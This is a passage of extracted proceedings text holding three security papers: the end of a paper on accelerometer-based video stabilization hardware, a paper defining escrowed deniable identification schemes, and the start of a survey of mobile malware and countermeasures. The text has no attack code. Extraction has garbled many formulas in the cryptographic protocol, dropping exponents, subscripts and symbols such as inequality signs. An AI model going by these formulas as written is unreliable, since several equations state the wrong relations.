The method described in the previous section uses only one bit plane to estimate the local motion vector. In order to improve the estimation of the local motion vector, we experimentally determined that at least two bit planes are suitable to increase the reliability of estimation. The next improvement lies in the usage of more than one maximum. This solution will be stable in the situations, where the edges have very low contrast. Now we are trying to use 5 highest maximum peaks in the searching area. This could be taken into the account by the computation of global motion vector. The last optimization is to split the image to some predefined number of regions, in which the maximums are searched. Robustness of such algorithm increases using this optimization. Our intention is to reduce the computational demands on processor (DSP) that the standalone unit without cooling could operate, and our algorithm should be stable also in regions, where nearly no clear edges exist, e.g. desert or sea.

3 Hardware Design Algorithms mentioned in the previous chapter can be easily implemented in a common PC. Our goal, however, is to design a standalone solution to the image stabilization, which has to fulfill defined specifications. Result of our aims should be a device able to stabilize an input video stream and to send the stabilized stream to an output. The specifications that must be fulfilled are defined as follows: • Size of the final board must not exceed 100×120 mm. • Height of the final product must be lower or equal to 12 mm.

DSP unit 1

FPGA unit 1

DSP unit 2

FPGA unit 2

Interface

SDRAM 1

M. Drahanský, F. Orság, and P. Hanáček

SDRAM 2

230

Video output

Video input

Microcontroller

Flash

SD card

Fig. 3. Proposed design of the board for the image stabilization [5]

• The board should contain four layers not exceeding total width of 1.5 mm. • The final product must be able to operate under military conditions, e.g. temperature of operation ranges from -40° to 85° C. 3.1 Description of Our Hardware Layout

The board consists of input/output connectors, persistent storage units, processing units, microcontroller, and video processing unit. The connectors serve simply for the video input and output purposes. The persistent storage is in a form of a FLASH memory containing software, which is booted after reset of the board. There is a slot for an SD card too, which enables user to upgrade the software. A new version of the software is uploaded to the FLASH memory automatically when an SD card is present in the slot. The microcontroller provides means of communications between the individual components (FLASH memory – SD Card, FLASH memory – FPGA etc.). The video processing unit consists of an encoder and decoder determined to encode/decode the video stream. The main part of the board is the processing unit. For this task we decided to use a combination of an FPGA and digital signal processor (FPGA-DSP combination) as the engine of the board. Since the board must count on future upgrades, it contains an independent pair of the FPGA-DSP combination (see Figure 3) working in parallel. Each FPGA-DSP combination has its own memory bank to avoid memory stalls and shared memory issues. This way there is one FPGA-DSP pair for the image stabilization and the other FGPA-DSP pair for the future upgrades (e.g. for an object tracking). Each module can operate separately, is independent (even though they can use each other’s results), and can be omitted from the final design, which makes the board very variable. The first processing unit serves for the purposes of the image stabilization. It can read frames from the input video stream, store them in its memory and process them. The resulting frames can be sent to the output video stream. The second processing unit doesn’t need to be included on the board. When it is present on the board however, it can communicate directly with the first module. It can read frames of the

Accelerometer Based Digital Video Stabilization for Security Surveillance Systems

231

input video stream and send them to the output video stream too. When both units are functional and working, the output stream is produced by the second unit. Each module can be turned off so that each stage of the video stream processing can be easily bypassed (it can be useful in some cases to see the unprocessed input video stream). This solution is a compromise between the hardware specifications, given constraints and algorithm requirements. The combination of an FPGA and DSP allows us to distribute tasks given by the algorithm between both – the processor and gate array. Hence, FPGA can perform some general operations (preliminary steps of the algorithm), whereas the DSP can focus itself on the calculations (e.g. Fast Fourier Transform). 3.2 Solution with an Accelerometer

When a camera is placed on some stable holder and the height of this holder is too big, the camera will be a subject o motion, caused by e.g. wind, asperity of the road, and waves on the sea. Motion of the camera is both rotational and linear. Rotational motion can be measured using a gyroscope, linear motion using an accelerometer. When a camera holder is not so big, rotational motion of the camera is the dominant form of camera movement. However, as the height of camera holder increases, linear motion becomes the dominant form of camera motion. Because we suppose high camera holders, we decided to use MEMS accelerometers for motion detection. Micro-Electro-Mechanical Systems (MEMS) is the integration of mechanical elements, sensors, actuators, and electronics on a common silicon substrate. MEMS accelerometers and gyroscopes are emerging at a very fast pace in consumer electronics products. Since 1998, MEMS gyroscopes were widely integrated into camcorders to provide optical stabilization features. In 2003, MEMS accelerometers entered consumer applications, in large volume, as a protection feature for Hard Disk Drives. We have done some experiments with this accelerometer, placed on mast (7 m long) – see Figure 4.

Fig. 4. Experiments with accelerometer (acquired during fine shaking of camera)

232

M. Drahanský, F. Orság, and P. Hanáček

We have a built-in MEMS accelerometer on our hardware board. We use the accelerometer from STMicroelectronics with the following characteristics [6]: • • • • •

Accelerations: ± 6g Bandwidth: 640 Hz Temperature ranges: -40°C till +85°C Interface: I2C or SPI Supply voltage: 2.5 V

Using this accelerometer we are able to measure movements of the whole camera system in all three directions and therefore we know the actual deviation from the balanced status. The stabilization algorithm receives the respective acceleration data from each of the accelerometer axis, and also knows a mechanical model of the camera holder. The algorithm then uses the data from mechanical model of the holder and the acceleration data to produce motion vector to correct the image captured by a camera that is in motion. For the computation we use the approximation of measured values in a time interval of 1 sec. The curve is smoothed and we take only the deviation of this average value from the balanced status, what gives us additional information to our algorithm for image stabilization. This information is used together with the values from software to combine them and to get the resulting needed value for image movement.

4 Conclusion We have a standalone unit with two DSP processors ready to realize digital image stabilization. One backup DSP-FPGA pair is ready for future use, e.g. for the task of an object tracking. At the moment, three parallel ways for the algorithm of image stabilization are used. We try to use common algorithms for this task, but with our optimizations and improvements to ensure strong robustness. The future work is to load the optimized parallelized program to the hardware unit. Testing and further optimizations, especially in parallelism, will be performed soon. Of course, further improvements will be needed, e.g. for different regions of usage (e.g. arctic ice region, windy areas etc.). In the future, we want to try to implement the image stabilization on another DSP platform which does not use a fixed point as our contemporary solution. Acknowledgments. This research has been done under the support of the grant “Security-Oriented Research in Information Technology”, MSM0021630528 (CZ) and the industrial company EVPU Defence s.r.o.

References 1. Brooks, A.C.: Real-Time Digital Image Stabilization, EE 420 Image Processing Computer Project Final Paper, p. 10. EED Northwestern University, USA (March 2003) 2. Sachs, D., Nasiri, S., Goehl, D.: Image Stabilization Technology Overview, p. 18. InvenSense Inc., USA (2007)

Accelerometer Based Digital Video Stabilization for Security Surveillance Systems

233

3. Ko, S.J., Lee, S.H., Jeon, S.W.: Fast Digital Image Stabilizer Based on Gray-Coded BitPlane Matching, pp. 90–91. IEEE, USA (1999) 4. Vella, F., Castorina, A., Mancuso, M., Messina, G.: Robust Digital Image Stabilization Algorithm Using Block Motion Vectors, pp. 234–235. IEEE, USA (2002) 5. Drahansky, M., Orsag, F.: Digital Image Stabilization in a Video-Stream. In: Proceedings of VISAPP 2009, Lisboa, PT, INSTICC, pp. 621–625 (2009) ISBN 978-989-8111-74-6 6. Web page of STMicroelectronics, http://www.st.com/

Escrowed Deniable Identification Schemes Pairat Thorncharoensri1, Qiong Huang2, Willy Susilo1 , Man Ho Au1 , Yi Mu1 , and Duncan Wong2 1

School of Computer Science & Software Engineering, University of Wollongong, Australia {pt78,wsusilo,mhaa456,ymu}@uow.edu.au 2 Department of Computer Science, City University of Hong Kong, Hong Kong [email protected], [email protected]

Abstract. Generally, the goal of identification schemes is to provide security assurance against impersonation attacks. Identification schemes based on zero knowledge protocols have more advantages, for example, deniability, which enables the prover to deny an identification proof so that the verifier couldn’t persuade others that it is indeed the prover who identified itself to him. However, in some applications we require the existence of a (trusted) party being able to find out an evidence that a party did identify itself to a verifier is required, in order to prevent parties from misbehavior. So in this case ‘undeniability’ is needed. To the best of our knowledge, an identification scheme that provides both deniability and undeniability does not exist in the literature. In this work we propose the notion of escrowed deniable identification schemes, which integrates both ‘escrowed deniability’ (undeniability) and ‘deniability’ properties.

1 Introduction Since the seminal introduction of zero-knowledge proof by Goldwasser, Micali and Rackoff many interactive identification schemes based on zero-knowledge proofs have been proposed. In the following, we borrow the politician example given in [4] and extend it. Politicians would like to enter a building equipped with a smart card identification system. A politician acts as a prover and the smart card reader acts as a verifier. In order to prevent the identities of politicians who entered the building from being revealed to paparazzi by the smart card verification system, deniable identification is needed in this case. Now imagine that at sometime, an emergency occurred in the building, and the administrator of it needs to find out who entered this building at certain time interval. If we still use deniable identification, an identification transcript does not necessarily mean that a politician did enter the building at that time interval. Hence, a new variant of identification schemes that we call ‘escrowed deniable identification’ is required. In this primitive, there is a (trusted) party who is able to produce an evidence to prove that a prover has participated in the generation of the identification transcript, and furthermore, the verifier cannot do so without the help of the trusted party. Our Contributions To the best of our knowledge, there is no identification which integrates both the deniability and undeniability. In this work we first propose the notion of ‘escrowed deniable 

This work is partially supported by ARC Linkage Project Grant LP0667899.

´ ezak et al. (Eds.): SecTech 2009, CCIS 58, pp. 234–241, 2009. D. Sl˛ c Springer-Verlag Berlin Heidelberg 2009 

Escrowed Deniable Identification Schemes

235

identification schemes’, which protects the identity of the prover from being revealed to the public by the verifier, and in the meanwhile, endows a (trusted) party with the ability to reveal the prover’s identity from an identification transcript non-interactively, thus restricting provers from misbehavior. Paper Organization In the next section we review some number-theoretic assumptions which will be used in our construction. We provide the definition of escrowed deniable identification scheme in Sec. 3. The formal models of security properties of an escrowed deniable identification scheme are also given here. In Sec. 4 we propose our efficient construction of escrowed deniable identification scheme and its security is analyzed Section 5 is the conclusion of the paper.

2 Preliminaries Basic Concepts on Bilinear Pairings and Complexity Assumptions Let G1 and G2 be cyclic multiplicative groups generated by g1 and g2 respectively. The order of both generators is a prime p. Let GT be a cyclic multiplicative group with the same order p. We say that eˆ : G1 × G2 → GT is an admissible bilinear pairing if the followings hold: First, Bilinearity: eˆ(g1a , g2b ) = eˆ(g1 , g2 )ab for all g1 ∈ G1 , g2 ∈ G2 , a, b ∈ Zp . Second, Non-degeneracy: There exists g1 ∈ G1 and g2 ∈ G2 such that eˆ(g1 , g2 ) = 1. At last, Computability: There exists an efficient algorithm to compute eˆ(g1 , g2 ) for all g1 ∈ G1 , g2 ∈ G2 .

3 Escrowed Deniable Identification In this section, we provide a formal model of an escrowed deniable identification scheme and its security model. 3.1 Escrowed Deniable Identification Schemes We introduce a notion called escrowed deniable identification scheme (EDID) that balances both the need for deniability and the need for undeniability in identification schemes. Formally, an EDID scheme involves a prover P , a verifier V , a trusted authority T A, and any third party V  . It consists of the following algorithms and protocols: Setup: On input 1k , where k is the security parameter, the algorithm generates a system parameter, i.e. param ← Setup(1k ). KeyGenT : On input param, it generates a public/secret key pair (pkT , skT ) for the trusted authority, i.e. (pkT , skT ) ← KeyGenT (param). KeyGenP : On input param, it generates a public/secret key pair (pkP , skP ) for the prover, i.e. (pkP , skP ) ← KeyGenP (param). Identification protocol (P, V ): This is an interactive protocol between the prover P and the verifier V . It consists of four rounds of communication and six PPT algorithms, (CmtV , CmtP , Ch, Rsp, CheckP , CheckV ). (CmtP , CheckP ) and (CheckV ,

236

P. Thorncharoensri et al.

CmtV ) are sets of algorithms to generate commitments and to verify the commitment run by the prover P and the verifier V , respectively. Ch is an algorithm to disclose the challenge and Rsp is an algorithm run by the prover P to generate the response. The Protocol run as follows: Step 1. V chooses a challenge c at random from a certain domain, and computes T ← CmtV (c). V then sends T to P . Step 2. P chooses r at random from a certain domain, and computes a ← CmtP (r). P then sends a to V . Step 3. V runs Ch to reveal a random challenge c, and sends it to P . Step 4. After receiving V ’s challenge c, P then runs b ← ckP (c, T ). If b = 0, P aborts; otherwise, it computes its response by running z ← Rsp(skP , r, c), and sends z to V . Step 5. V checks the validity of P ’s response by running CheckV (pkT , pkP , a, c, z). If the output is ‘1’, V accepts; otherwise, it rejects. Open protocol (T A, V ): An open protocol can be formalized by two (probabilistic) polynomial-time algorithms Open, Verf, where Open is invoked by T A, and Verf is executed by the verifier V . On input a transcript tr and the secret key of T A, Open outputs an evidence to affirm the authenticity of tr. Verf is an algorithm for validating the validity of the evidence with respect to tr and pkP . It takes as input pkT , pkP , tr and the evidence, and outputs 1 for accepting or 0 for rejecting the evidence. Transfer protocol (V, V  ): A transfer protocol is an interactive protocol between the verifier V , who possesses a transcript tr and its affirmative evidence from the trusted authority (T A), and any third party V  . The aim of the protocol is to convince V  that tr indeed represents an execution of the identification protocol between P and V . 3.2 Deniability Roughly speaking, deniability indicates that given a transcript of an execution of the identification protocol, the prover is able to deny that he is the prover in the execution. To achieve the deniability, we require that the verifier itself could generate this transcript. Formally, we consider the following definition, which share a similarity with that of zero knowledge. Definition 1 (Deniability). An escrowed deniable identification scheme EDID is deniable if for any P aram ← Setup(1k ), (pkT , skT ) ← KeyGenT (param) and (pkP , skP ) ← KeyGenP (param), for any PPT algorithm D, for any verifier strategy V ∗ , there exists a PPT algorithm S which has oracle access to V ∗ , such that |Pr[Expt1 (k) = 1] − Pr[Expt2 (k) = 1]| = (k), where (·) is a negligible function in k, and Expt1 (k) and Expt2 (k) are defined as follows: Expt1 (k): Expt2 (k): ∗ ∗ tr ← P (skP ), V (pkT , pkP ) tr ← S V (pkT , pkP ) b ← D(pkT , pkP , tr) b ← D(pkT , pkP , tr) return b return b where the probabilities are taken over the random bits used in Setup, KeyGenT , KeyGenP , and random bits consumed by P , V ∗ , S and D.

Escrowed Deniable Identification Schemes

237

3.3 Impersonation An identification scheme is secure against the impersonation meant that no one except the prover P with its public key pkP can identify itself to others as P . In this work we consider the impersonation under active attacks. An imp-aa adversary A is a pair of PPT algorithms (A1 , A2 ), where A1 acts as V ∗ and A2 acts as P ∗ . Let st denote the state of information. The active attack is initialized by first calling Setup, KeyGenT and KeyGenP to generate public/secret key pairs (pkT , skT ) and (pkP , skP ) for the trusted authority and the prover respectively. Taking public keys pkT and pkP as input, the adversary A then performs its attack in the following two phases: Phase 1. (Learning Phase) Given input pkT , pkP , A1 is allowed to interact with P ’s clones sequentially. When each of P ’s clones interacts with A1 , it is initialized with (pkP , skP ), pkT and fresh random coins. Later, A1 outputs st to be passed onto A2 . Phase 2. (Impersonation Phase) V is initialized with pkT , pkP , while the adversary A2 is given st. Then A2 tries to impersonate P to V . At last, V outputs a decision bit b, indicating accept or reject. The adversary A is said to be successful in the attack if V outputs 1 at the end of Phase 2. Formally, we consider the following experiment: Exptimp−aa (k): A param ← Setup(1k ) (pkT , skT ) ← KeyGenT (param) (pkP , skP ) ← KeyGenP (param) P (sk ) (⊥, st) ← A1 P (pkT , skT , pkP ) (⊥, b) ← A2 (skT , st), V (pkT , pkP ) return b where an oracle call to P (skP ) results in an execution of the identification protocol with the prover P and a transcript tr is returned. Definition 2 (Security against Impersonation under Active Attack). We say an escrowed deniable identification scheme EDID is secure against impersonation under active attack, if there is no PPT adversary A = (A1 , A2 ) such that the probability (k) = 1] is negligible in k. Pr[Exptimp−aa A Note that in the definition above the adversary can be the trusted authority. That is, even TA cannot impersonate the prover in an active attack. 3.4 Transferability Intuitively, the notion of transferability in escrowed deniability identification schemes is aimed to reveal the transcript confirmation or evidence that proves the validity of the prover of the transcript. In the experiment below, the adversary is modeled as a malicious verifier who tries to convince any third party to accept the transcript without the help of the trusted authority. Hence, the trusted authority is viewed as an opening oracle OEDIDOpen who answers queries for opening the chosen transcript. We provide a formal definition of transferability as follows: Let V ∗ be any verifier strategy (honest

238

P. Thorncharoensri et al.

or malicious). Let tr ← P (sk), V ∗ (pk) be the transcript of an interaction between P and V ∗ , and let σ ← T A(skT A ), V ∗ (pk) be the confirmation evidence σ of an interaction between T A and V ∗ . Let Verf be the verifier’s decision algorithm which takes a transcript tr and its confirmation evidence σ as inputs and outputs 1 or 0, which indicate ‘accept’ or ‘reject’, respectively. Let S be a probabilistic polynomial-time algorithm. We consider the following experiment: Expttran A (k): (pk, pkT , sk, skT ) ← KeyGen(1k ) OEDID

,OEDID

ID Open (⊥, st) ← A1 (pk, pkT ) ∗ ∗ (tr , σ ) ← A2 (st) If (tr∗ , σ ∗ ) has been queried to OEDIDID , OEDIDOpen then ⊥, otherwise, in the transfer protocol(or any other protocol for transferring the proof (tr∗ , σ ∗ )), (⊥, b) ← A2 (tr∗ , σ ∗ ), AnyV (pk, pkT ) Return b

Adversary A is said to be successful in the attack if AnyV outputs b = accept. Definition 3 (Security against Transferability Attack). An identification scheme ID = (KeyGen, P , V ) is said to be secure against transferability attack if there is no probabilistic polynomial-time tran adversary A = (A1 , A2 ) such that the probability Pr[Expttran A (k) = 1] is negligible in k. Oracle OEDIDID : Oracle OEDIDOpen (tr): Oracle OH (str): σ ← Open(skT , pkT , tr) m ← H(str) tr = (a, b, z) ← OEDIDID (skP ), V (pkT , pkP ) b ← Verf(tr, σ, pkT ) Return m Return σ iff b = accept Return tr Otherwise, return ⊥ Fig. 1. Oracle for adversary attacking transferability of escrowed deniability identification scheme

4 Our Construction In this section, we present our scheme based on the idea outlined above. The construction uses a Boneh-Boyen short signature scheme and verifiable encryption scheme due to Boneh et al. [1,2]. We incorporate the technique in [3] to construct our EDID scheme in the standard model. The scheme works as follows. 1. Setup: Let (G1 , GT ) be two multiplicative cyclic groups where |G1 | = |GT | = p for some large prime p. g, g1 and g2 are generators of G1 and eˆ : G1 × G1 → GT is a bilinear pairing. Let H : {0, 1}∗ → Z∗p be a collision-resistant hash function. The system parameter param then consists of (G1 , GT , eˆ, p, g, g1 , g2 , H). 2. KeyGenT : Given the public parameter param, KeyGenT Select random numbers x, y ∈ Zp ; W ∈ G1 and compute V = W y , U = V x . The public key and private key of the trusted authority are pkT = (U, V, W ) and skT = (x, y) respectively.

Escrowed Deniable Identification Schemes

239

3. KeyGenP : Given the public parameter param, KeyGenP selects a random number s ∈ Zp and compute SP = g1s . The public key and private key of the prover are pkP = SP and skP = s respectively. 4. Identification protocol: The protocol comprises two parts. The first part is a 4-round zero-knowledge proof protocol of the Schnorr Identification, in which the prover P proves to the verifier V that he knows the secret key s which is the discrete logarithm of the public key SP to base g1 . In the second part of the identification protocol, prover P generates a BB04 short signature σ on the 4-round Schnorr Identification transcript he just carried out with the verifier. P then computes σ ˆ, which is the verifiable encryption of σ under the TA’s public key, and sends it to the verifier. Finally, P proves, in an interactive manner, to the verifier that σ ˆ is correctly formed. Following the description above, the protocol will be more than four rounds. Optimization of the round efficiency of the protocol can be done by setting σ to be the signature on the first two rounds of the 4-round Schnorr Identification protocol and conducting the proof-of-correctness of σ ˆ in parallel with the Schnorr Identification with the verifier. The resulting protocol remains four rounds and it is shown as follows. (a) 1st Round (V to P ). (Commitment of Challenge.) V randomly generates $

c, d ← Z∗p , computes T = g1c g2d and sends T to P .

$

(b) 2nd Round (P to V ). First, P randomly generates rs ← Z∗p , computes T = g1rs . Now, P runs the KeyGen of BB04 signature for the one time public key pkOT and the one time secret key skOT . However, P can simply use some common parameter from param such as p, eˆ for BB04 signature. Hence, on input param, P randomly selects ga , gb ∈ G1 ; α, η ∈ Zp and computes the one time public key pkOT = (ga , gb , U = gbα , V = gbη , Z = eˆ(ga , gb )) and the $

one time secret key skOT = (α, η). Second, P randomly selects a, b ← Z∗p $

and computes E1 = U a and E2 = V b . Then, P randomly generates ra , rb ← Z∗p and computes A1 = U ra and A2 = V rb . Let m = H(pkOT ). Third, 1

P computes a signature σ = g s+m . Then, P computes E3 = σW a+b and A3 = eˆ(W, SP g1m )ra +rb . Parse Aˆ as (A1 , A2 , A3 ) and Eˆ as (E1 , E2 , E3 ). Let m ¯ = H(T, T, pkP , E1 , E2 , E3 , A1 , A2 , A3 ). At last, on input pkOT , skOT , 1

$

P randomly chooses κ ← Z∗p and computes σ ¯ = gaα+κ·η+m¯ . Then P sends ˆ A) ˆ to V . (T, pkOT , σ ¯ , κ, E, rd (c) 3 Round (V to P ). (Challenge.) V sends c, d to P . ? (d) 4th Round (P to V ). (Response.) P checks if T = g1c g2d . Output ⊥ is the check fails. Otherwise compute zs = rs − cs, za = ra − ca and zb = rb − cb. Set Zˆ as (zs , za , zb ) and send Zˆ to V . (e) (Verification.) V computes m ¯ = H(T, T, pkP , E1 , E2 , E3 , A1 , A2 , A3 ) and m = H(pkOT ) and outputs accept if the following holds: ?

?

?

¯ T1 = SPc g1zs , eˆ(ga , gb ) = eˆ(σ, U · V κ · g2m ), A1 = E1c U za ,

240

P. Thorncharoensri et al. Open TA m ¯ ← H(T, T, pkP , E1 , E2 , E3 , A1 , A2 , A3 ); m ← H(pkOT );

V def ˆ E, ˆ c, d, Z) ˆ ←−−−− tr = (T, T, pkOT , σ ¯ , κ, A, tr

?

iff not (T1 = SPc g1zs ∧ ?

¯ eˆ(ga , gb ) = eˆ(σ, U · V κ · g2m )∧ ?

? A1 = E1c U za ∧ A2 = E2c V zb m c ? e ˆ(E3 ,SP g1 ) ∧ A3 = e ˆ(g,g1 ) eˆ(W, SP g1m )za +zb )

then ⊥. Otherwise, 1/xy 1/x σ ← E3 /(E1 E2 ); ?

iff eˆ(g, g1 ) = eˆ(σ, SP g1m ) then def

Open(skT A ) = σ, else ⊥

σ

?

−−−−→ Verf: iff eˆ(g, g1 ) = eˆ(σ, SP g1m ) then Verf = accept ,else Verf = reject

Transfer V

Any third party $



$

T

a , ra ← Z∗p ;  D1 ← σg2a ; D2 ← eˆ(g2 , SP g1m )ra ;

←−−−− c , d ← Z∗p ; T = g1c g2d



tr,D ,D

Cmt(pkP , tr, ra , a ) = (D1 , D2 ) −−−1−→2 def

?





iff (T = g1c g2d ) then z ← ra + c a ; def Rsp(pkP , skP , Cmt, Ch) = z, else ⊥

c ,d

←−−−− Ch = (c , d ) def

z

−−−−→ Check: m ¯ ← H(T, T, pkP , E1 , E2 , E3 , A1 , A2 , A3 ) and m ← H(pkOT ). 

?

iff (ˆ e(D1 , SP g1m )/ˆ e(g, g1 ))c = −1 m z D2 eˆ(g2 , SP g1 ) ?

¯ ∧ eˆ(ga , gb ) = eˆ(σ, U · V κ · g2m ), then the transcript tr was generated by P

Fig. 2. Open & Transfer Protocols

?

?

A2 = E2c V zb , A3 =



eˆ(E3 , SP g1m ) eˆ(g, g1 )

c

eˆ(W, SP g1m )za +zb .

Output reject otherwise. 5. Open protocol: A protocol can be denoted by OP = ( Open, Verf), where Open and Verf are PPT algorithms used in the protocol detailed in Figure 2. 6. Transfer protocol: A protocol can be denoted by T P = ( Cmt, Ch, Rsp, Check ), where Cmt, Ch, Rsp and Check are PPT algorithms used in the following protocol,

Escrowed Deniable Identification Schemes

241

where the verifier V proves that a transcript denoted as tr is indeed generated by P to any third party verifier. This protocol is illustrated in Figure 2. Theorem 1. The identification protocol in our identification scheme EDID is deniable. Theorem 2. The transfer protocol in our identification scheme EDID = (Setup, KeyGen, P, V, T A, AnyV ) is zero knowledge protocol. Theorem 3. Our identification scheme EDID is secure against impersonation under active attacks in the standard model, if the q-DL assumption holds. Theorem 4. Our identification scheme EDID = (Setup, KeyGen, P, V, T A, AnyV ) is secure against transferability attack if only the q-SDH problem hold under in the standard model. Due to the page limitation, please find the proof for Theorem 1, 2, 3 and 4 in the full version of this paper [5].

5 Conclusion We introduced a new notion called escrowed deniability in an identification scheme. This notion bridges the gap between deniability and non-deniability in the identification scheme. We have also provided a concrete scheme that satisfies this new notion. The security of our identification scheme provides for both impersonation and transferability (escrowed deniability). In short, we believe the escrowed deniability property is an essential feature for identification schemes where the need for incorporation and disaffirmation is crucial.

References 1. Boneh, D., Boyen, X.: Short signatures without random oracles. In: Cachin, C., Camenisch, J.L. (eds.) EUROCRYPT 2004. LNCS, vol. 3027, pp. 56–73. Springer, Heidelberg (2004) 2. Boneh, D., Gentry, C., Lynn, B., Shacham, H.: Aggregate and verifiably encrypted signatures from bilinear maps. In: Biham, E. (ed.) EUROCRYPT 2003. LNCS, vol. 2656, pp. 416–432. Springer, Heidelberg (2003) 3. Huang, Q., Wong, D.S., Li, J., Zhao, Y.: Generic transformation from weakly to strongly unforgeable signatures. J. Comput. Sci. Technol. 23(2), 240–252 (2008) 4. Thorncharoensri, P., Huang, Q., Au, M.H., Susilo, W., Yang, G., Mu, Y., Wong, D.S.: The need for deniability in identification schemes. In: Short Presentation Track in 9th International Workshop on Information Security Applications, WISA 2008 (September 2008) 5. Thorncharoensri, P., Huang, Q., Susilo, W., Au, M.H., Mu, Y., Wong, D.: Escrowed deniable identification schemes (full version). Can be obtained from the first author (2009)

Insights into Malware Detection and Prevention on Mobile Phones Qiang Yan1 , Yingjiu Li1 , Tieyan Li2 , and Robert Deng1 1

School of Information Systems, Singapore Management University 2 Institute for Infocomm Research, A*STAR, Singapore {qiang.yan.2008,yjli,robertdeng}@smu.edu.sg, [email protected]

Abstract. The malware threat for mobile phones is expected to increase with the functionality enhancement of mobile phones. This threat is exacerbated with the surge in population of smart phones instilled with stable Internet access which provides attractive targets for malware developers. Prior research on malware protection has focused on avoiding the negative impact of the functionality limitations of mobile phones to keep the performance cost within the limitations of mobile phones. Being different, this paper investigates the positive impact of these limitations on suppressing the development of mobile malware. We study the stateof-the-art mobile malware, as well as the progress of academic research and industrial effort against mobile malware. Our study shows that the functionality limitations of mobile phones should be considered as advantages as they have significant impact on shrinking the living space of mobile malware. From this perspective, we propose and analyze three potential directions for effective malware detection and prevention on mobile phones.

1

Introduction

Malware is one of the most well-known security threats to mobile phones, which comes from the concern about privacy disclosure from the mobile phones as more and more people carry them all the time and store more and more sensitive information on them. The malware targeting mobile phones (called mobile malware) develops slowly in the past five years since the first proof-of-concept mobile malware “Cabir” was proposed in 20041. Until now, the total number of mobile malwares is known to be hundreds, which is a small number as compared to millions of PC malwares2. Nonetheless, mobile malware causes serious public concern as the population of mobile phones is much larger than the population of PCs. According to Gartner, worldwide mobile phone sales total 269.1 million units in the first quarter of 20093 , while worldwide PC shipments only reach 292 million units in the whole year of 20084. A large scale outbreak of mobile 1 2 3 4

Viruslist, http://www.viruslist.com/en/analysis?pubid=200119916 Symantec, http://www.symantec.com/business/theme.jsp?themeid=threatreport Gartner, http://www.gartner.com/it/page.jsp?id=985912 Gartner, http://www.gartner.com/it/page.jsp?id=1040020

´ ezak et al. (Eds.): SecTech 2009, CCIS 58, pp. 242–249, 2009. D. Sl  c Springer-Verlag Berlin Heidelberg 2009 

Insights into Malware Detection and Prevention on Mobile Phones

243

malware could be more serious than the outbreaks of PC malware that we have seen in the past decades. The recent rapid functionality enhancement of mobile phones driven by the population surge of smart phone platforms is expected to increase the security threat from mobile malware. The enhanced functionalities such as faster Internet access and standardized programming APIs provide an ideal breeding ground for malware development. Prior research [1,2,3,4] on malware protection has focused on avoiding the negative impact of the functionality limitations of mobile phones. The major efforts are to keep the performance cost within the limitations of mobile phones. Although the energy-efficiency criterion and other capability restrictions limit the effectiveness of complex malware protection solutions, they also limit the power of mobile malware. The positive impact of these functionality limitations could be one of the major reasons to explain the slow development of mobile malware in the past five years. To understand the impact of the functionality limitations of mobile phones, this paper studies the state-of-the-art mobile malware, and the progress of academic research and industrial effort against mobile malware. Our study shows that the functionality limitations of mobile phones have significant impact on suppressing the development of mobile malware. From this perspective, we propose and analyze three potential directions for effective malware detection and prevention on mobile phones.

2

State-of-the-Art Mobile Malware and Countermeasures

2.1

State and Trends on Mobile Malware

Due to lack of sufficient number of wild malware samples, we investigate the state of mobile malware based on the vulnerability records in Common Vulnerabilities and Exposures (CVE) database5 . Figure 1(a) shows the distribution of software vulnerabilities on mobile systems in the CVE database retrieved at July 25, 2009. It can be observed that the number of vulnerability records increases dramatically after the rise of the smart phone platform. Especially iPhone contributes to half of the number of the vulnerability records in its first two-and-a-half years. From the distribution of attack types shown in Figure 1(b), until 2007, Denial of Service is still the dominant attack type that can be exploited from the known vulnerabilities (50.0%). This explains that most mobile malware in the past is only able to affect the availability of a mobile phone such as application crash and device reset. Only a few of mobile malware targeting at special mobile phones is able to launch advanced attacks such as distributed denial of service for some specific phone numbers (Redbrowser Trojan, 2006) [5]. Unfortunately, the functionality limitations for mobile malware are significantly relaxed after the release of smart phone platforms. This trend brings more serious vulnerabilities that allow mobile malware to execute arbitrary code. The percentage of its vulnerability record number is raised from 7.7% to 22.0% in the past three 5

CVE database, http://cve.mitre.org

244

Q. Yan et al.

50

Other Mobile Systems (15, 10.6%)

45 40

Palm (15, 10.6%)

35

Android (8, 5.7%)

30

BlackBerry (6, 4.3%)

25 20

Windows Mobile (16, 11.3%)

15

iPhone (73, 51.8%)

10 5

Symbian (6, 4.3%)

0

45 40 Other attacks (39, 27.7%)

35 30

Spoof URL bar (7, 5.0%)

25

Cross-site scripting (21, 14.9%)

20 15

Execute arbitrary code (31, 22.0%)

10

Denial of Service (43, 30.5%)

5 0 2009

(a)

2008

2007

2006

2005

2004

2003

2002

2009

2008

2007

2006

2005

2004

2003

2002

J2ME (2, 1.4%)

50

(b)

Fig. 1. Distribution of software vulnerabilities on (a) mobile systems and (b) attack types in Common Vulnerabilities and Exposures database. Each bar describes the number of vulnerability records for each mobile system or attack type in each year. The numbers after the legend text are the sum and percentage of the record number from 2002 to 2009. Note: The attack types are classified based on the description of vulnerability records. If the description of a vulnerability record contains both “execute arbitrary code” and “denial of service”, it will be classified into “execute arbitrary code”.

years. Moreover, the availability of standardized programming APIs on smart phone platforms and faster Internet access via 3G and WiFi make it easier for malware development and propagation. Nowadays, still a significant barrier for the known mobile malwares is that user interaction must be involved for those non-crash-purpose malwares. None of today’s mobile malwares are able to install secretly without the users accepting the standard security warnings [6]. Social engineering techniques, such as pretending to be a theme, a system patch, or a game installation, are widely used to tempt users to run malwares on mobile phones. So the interest of mobile malware is largely dependent on the market share of mobile phones. The latest cell-phone malwares report from F-Secure [6] indicates that, until 2007, 364 out of 373 malwares are designed for the most popular mobile OS, Symbian (47.1% market share in Q4 20086), which however has only six vulnerability records in the CVE database until 2009. The most popular infection mechanism is still user download (373 cases). The rapid market growth of iPhone will make it the next attractive target for malware development. 2.2

Academic Research against Mobile Malware

The academic research on mobile malware detection began later as mobile malware developed slowly in the past few years. Less than ten samples of wild mobile malwares including Cabir, Mabir, Commwarrior, and Lasco are available to 6

Smartphone Market Share, http://en.wikipedia.org/wiki/Smartphone

Insights into Malware Detection and Prevention on Mobile Phones

245

